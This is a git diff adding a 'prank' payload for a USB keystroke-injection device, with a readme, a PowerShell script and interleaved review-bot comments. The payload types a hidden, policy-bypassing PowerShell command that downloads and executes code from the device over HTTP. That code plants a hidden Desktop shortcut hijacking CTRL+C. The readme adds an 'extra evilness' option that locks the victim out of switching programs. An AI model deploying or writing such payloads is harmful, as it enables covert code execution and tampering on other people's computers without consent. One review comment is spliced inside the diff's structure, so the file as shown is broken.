diff --git a/payloads/library/prank/Win_PoSh_HiThere/payload.txt b/payloads/library/prank/Win_PoSh_HiThere/payload.txt
new file mode 100644
index 00000000..06d8fb8f
--- /dev/null
+++ b/payloads/library/prank/Win_PoSh_HiThere/payload.txt
@@ -0,0 +1,37 @@
+#!/bin/bash
+# Title: Hi There
+# Description: Creates a hidden link file that override the ctrl+c functionality.
+# So, where the use press ctrl+c it lunches the first sign-in animation.
+# Author: Cribbit
+# Version: 1.0
+# Category: Pranks
+# Target: Windows (Powershell 5.1+)
+# Attackmodes: RNDIS_ETHERNET HID
+# Props: v3ded, Hexacorn and Audibleblink (Python Server)
+
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET HID
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+
+# starting server
+LED SPECIAL
+
+# disallow outgoing dns requests so server starts immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
+
+# wait until port is listening
+while ! nc -z localhost 80; do sleep 0.2; done
+
+# attack commences
+LED ATTACK
+QUACK DELAY 200
+RUN WIN "powershell -Noni -NoP -W h -EP Bypass -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
+QUACK DELAY 500
+QUACK CTRL c
+LED FINISH
\ No newline at end of file
diff --git a/payloads/library/prank/Win_PoSh_HiThere/readme.md b/payloads/library/prank/Win_PoSh_HiThere/readme.md
new file mode 100644
index 00000000..ea7f5a4c
--- /dev/null
+++ b/payloads/library/prank/Win_PoSh_HiThere/readme.md
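Review bot: The readiness loop `while ! nc -z localhost 80; do sleep 0.2; done` never terminates if the background server fails to bind — for instance when `python` resolves to Python 3, where the `SimpleHTTPServer` module does not exist — so the payload sits at LED SPECIAL with no indication of failure. Bounding the wait, e.g. `while ! nc -z localhost 80; do (( ++tries > 50 )) && exit 1; sleep 0.2; done`, turns that silent hang into a visible exit. Separately, `cd /root/udisk/payloads/$SWITCH_POSITION/` is neither checked nor quoted, and because SimpleHTTPServer serves its working directory, a failed `cd` would expose whatever directory the script happens to be running in over the RNDIS link; `cd "/root/udisk/payloads/$SWITCH_POSITION/" || exit 1` avoids that.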
@@ -0,0 +1,33 @@
+# Hi There
+- Author: Cribbit
+- Version: 1.0
+- Tested on: Windows 10 (Powershell 5.1+)
+- Category: Pranks
+- Attackmode: HID & RNDIS_ETHERNET
+- Extensions: Run
+- Props: v3ded, Hexacorn and Audibleblink (Python Server)
+
+## Change Log
+| Version | Changes |
+| ------- | --------------- |
+| 1.0 | Initial release |
+
+## Description
+Creates a hidden link file that override the ctrl+c functionality.
+So, where the use press ctrl+c it lunches the first sign-in animation.
+
+## Notes
+to kill the animation, you need to open task manger and look for "First Sign-in Animation".
+For extra evilness add `/explorer` to the `$shortcut.Arguments` line in the script file. Then you can't switch programs or kill it.
+
+## More information
+
+
+
+
+## Colours
+| Status | Colour | Description |
+| -------- | ----------------------------- | --------------------------- |
+| SETUP | Magenta solid | Setting attack mode |
+| ATTACK | Yellow single blink | Injecting Powershell script |
+| FINISHED | Green blink followed by SOLID | Injection finished |
\ No newline at end of file
diff --git a/payloads/library/prank/Win_PoSh_HiThere/s b/payloads/library/prank/Win_PoSh_HiThere/s
new file mode 100644
index 00000000..2641a532
--- /dev/null
+++ b/payloads/library/prank/Win_PoSh_HiThere/s
@@ -0,0 +1,19 @@
+$path = "$([Environment]::GetFolderPath('Desktop'))\readme.lnk"
+$wshell = New-Object -ComObject Wscript.Shell
+$shortcut = $wshell.CreateShortcut($path)
+
+$shortcut.IconLocation = "C:\Windows\System32\shell32.dll,70"
+
+$shortcut.TargetPath = "C:\Windows\System32\oobe\FirstLogonAnim.exe"
+$shortcut.Arguments = "/RunFirstLogonAnim"
+$shortcut.WorkingDirectory = "C:"
+$shortcut.HotKey = "CTRL+C"
+$shortcut.Description = "Contain very important information"
+
+$shortcut.WindowStyle = 7
+ # 7 = Minimized window
+ # 3 = Maximized window
+ # 1 = Normal window
+$shortcut.Save()
+
+(Get-Item $path).Attributes += 'Hidden' # Optional if we want to make the link invisible (prevent user clicks)
\ No newline at end of file
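Review bot: `$shortcut.WorkingDirectory = "C:"` is a drive letter without a root separator, which Windows resolves relative to the current directory on that drive rather than to the root; if the root is intended, `"C:\"` is the unambiguous form. The script also leaves two artifacts on the host that nothing documents — a Desktop `readme.lnk` carrying the Hidden attribute and a CTRL+C hotkey bound to it — and the accompanying readme only explains how to stop the animation, not how to restore the key; a header comment naming the artifact and its removal (`Remove-Item -Force` on the hidden link, since `Get-Item`/`Get-ChildItem` skip hidden files without `-Force`) would make cleanup possible. Because line 1 uses the fixed name `readme.lnk`, an existing shortcut of that name on the Desktop appears to be silently overwritten by `CreateShortcut`/`Save()`; a `Test-Path $path` guard before line 3 would avoid clobbering a user's own file.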